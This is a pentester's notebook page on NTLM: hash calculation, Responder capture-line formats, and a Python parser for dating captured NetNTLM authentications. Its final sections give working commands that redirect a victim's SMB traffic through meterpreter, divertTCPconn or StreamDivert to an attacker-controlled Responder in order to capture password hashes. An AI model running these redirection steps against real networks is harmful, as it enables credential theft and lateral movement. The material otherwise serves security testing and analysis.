Pentester's Promiscuous Notebook
NTLM
NT / LM Hashes
https://blog.redforce.io/windows-authentication-and-attacks-part-1-ntlm/
Calculate NTLM
https://www.browserling.com/tools/ntlm-hash
With Python:
>>> import hashlib
>>> hashlib.new('md4', 'Passw0rd!'.encode('utf-16le')).hexdigest()
Note: hashlib only offers MD4 when the OpenSSL build behind it still ships the digest. On OpenSSL 3 MD4 lives in the legacy provider, so hashlib.new('md4') raises ValueError (unsupported hash type) unless that provider is loaded.
Responder Capture Structure
https://github.com/lgandx/Responder/blob/eb449bb061a8eb3944b96b157de73dea444ec46b/servers/SMB.py#L149
https://ru.wikipedia.org/wiki/NTLMv2#NTLMv2
https://www.ivoidwarranties.tech/posts/pentesting-tuts/responder/cheatsheet/
Andrei Miroshnikov. Windows Security Monitoring: Scenarios and Patterns, Part III, pp. 330-333.
[SMB] NTLMv1 Hash and [SMB] NTLMv1-SSP Hash capture structure:
<Username>:<Domain>:<LMv1_Response>:<NTv1_Response>:<Server_Challenge>
[SMB] NTLMv2-SSP Hash capture structure:
<Username>:<Domain>:<Server_Challenge>:<LMv2_Response>:<NTv2_Response>
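As an added example (not code from the notebook), a parser for the two capture layouts above: it tells NTLMv1 from NTLMv2 by the field lengths (24-byte LM/NT responses and a trailing 8-byte challenge versus a leading 8-byte challenge and a 16-byte HMAC), and for NTLMv2 it reads the timestamp and client challenge out of the last field, which is the NTLMv2_CLIENT_CHALLENGE blob from MS-NLMP. That is what an analyst needs to date a captured authentication while triaging. It assumes that lines with an empty field after the username (the user::DOMAIN:... form) should be accepted too; both sample lines are constructed, including the FILETIME value.

```python
import re
import struct
from datetime import datetime, timedelta, timezone

_HEX = re.compile(r"^[0-9a-fA-F]+$")


def _is_hex(s: str, nbytes=None) -> bool:
    return bool(_HEX.match(s)) and (nbytes is None or len(s) == 2 * nbytes)


def filetime_to_datetime(ft: int) -> datetime:
    """FILETIME = 100 ns ticks since 1601-01-01 00:00 UTC."""
    return datetime(1601, 1, 1, tzinfo=timezone.utc) + timedelta(microseconds=ft // 10)


def parse_capture(line: str) -> dict:
    """Classify one captured NetNTLM line by its field lengths.

    Empty fields are dropped after splitting on ':', so the five-field layout
    and the variant with an empty field after the username both parse
    (assumption of this example).
    """
    fields = [f for f in line.strip().split(":") if f != ""]
    if len(fields) != 5:
        raise ValueError("expected 5 non-empty fields, got %d" % len(fields))
    user, domain, f3, f4, f5 = fields

    # NTLMv1: 24-byte LM response, 24-byte NT response, 8-byte server challenge last.
    if _is_hex(f3, 24) and _is_hex(f4, 24) and _is_hex(f5, 8):
        return {"version": 1, "user": user, "domain": domain,
                "server_challenge": f5.lower(),
                "lm_response": f3.lower(), "nt_response": f4.lower()}

    # NTLMv2: 8-byte server challenge, 16-byte NTProofStr (HMAC-MD5), then the
    # client blob: 0x0101, 2 reserved, 4 reserved, 8-byte FILETIME,
    # 8-byte client challenge, 4 reserved, AV_PAIRs, 4-byte terminator.
    if _is_hex(f3, 8) and _is_hex(f4, 16) and _is_hex(f5) and len(f5) >= 2 * 28 and len(f5) % 2 == 0:
        blob = bytes.fromhex(f5)
        if blob[:2] != b"\x01\x01":
            raise ValueError("NTLMv2 blob does not start with RespType/HiRespType 0x0101")
        ticks = int.from_bytes(blob[8:16], "little")
        return {"version": 2, "user": user, "domain": domain,
                "server_challenge": f3.lower(), "ntproofstr": f4.lower(),
                "client_challenge": blob[16:24].hex(),
                "timestamp": filetime_to_datetime(ticks)}

    raise ValueError("field lengths match neither NTLMv1 nor NTLMv2")


# Constructed samples: dummy hex for the responses, a blob assembled by hand.
SAMPLE_FILETIME = 133485408000000000          # 2024-01-01T00:00:00Z
_SAMPLE_BLOB = (
    b"\x01\x01\x00\x00" + b"\x00" * 4
    + struct.pack("<Q", SAMPLE_FILETIME)          # TimeStamp
    + bytes.fromhex("0011223344556677")           # ChallengeFromClient
    + b"\x00" * 4
    + struct.pack("<HH", 2, 8) + "CORP".encode("utf-16le")   # AV_PAIR MsvAvNbDomainName
    + b"\x00" * 4                                  # MsvAvEOL
)
SAMPLE_V1 = "alice:CORP:" + "aa" * 24 + ":" + "bb" * 24 + ":" + "cc" * 8
SAMPLE_V2 = "bob::CORP:1122334455667788:" + "ab" * 16 + ":" + _SAMPLE_BLOB.hex()


if __name__ == "__main__":
    for sample in (SAMPLE_V1, SAMPLE_V2):
        print(parse_capture(sample))
```

The timestamp is the client's clock at the moment it answered the challenge, so when reviewing a capture file the parsed value places each line on the incident timeline independently of when the file was written.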
Capture NTLM on Windows
https://reqrypt.org/windivert.html
https://github.com/basil00/Divert
https://googleprojectzero.blogspot.com/2021/08/understanding-network-access-windows-app.html
DivertTCPconn
https://github.com/Arno0x/DivertTCPconn
Divert incoming SMB traffic on the victim to the victim's local port 8445, send it through a reverse-forwarded port (the meterpreter session must be elevated) to the attacker's local port 445, and capture the hashes with Responder:
$ sudo ./Responder.py -I eth0 -Av
meterpreter > portfwd add -R -L 127.0.0.1 -l 445 -p 8445
meterpreter > execute -f divertTCPconn.exe -a "445 8445"
StreamDivert
https://github.com/jellever/StreamDivert
Divert all inbound TCP connections to port 445 (SMB) coming from 192.168.1.11 to 10.10.13.37 port 445:
Cmd > powershell -c "Add-Content conf.txt 'tcp < 445 192.168.1.11 -> 10.10.13.37 445'"
Cmd > .\StreamDivert.exe .\conf.txt -f -v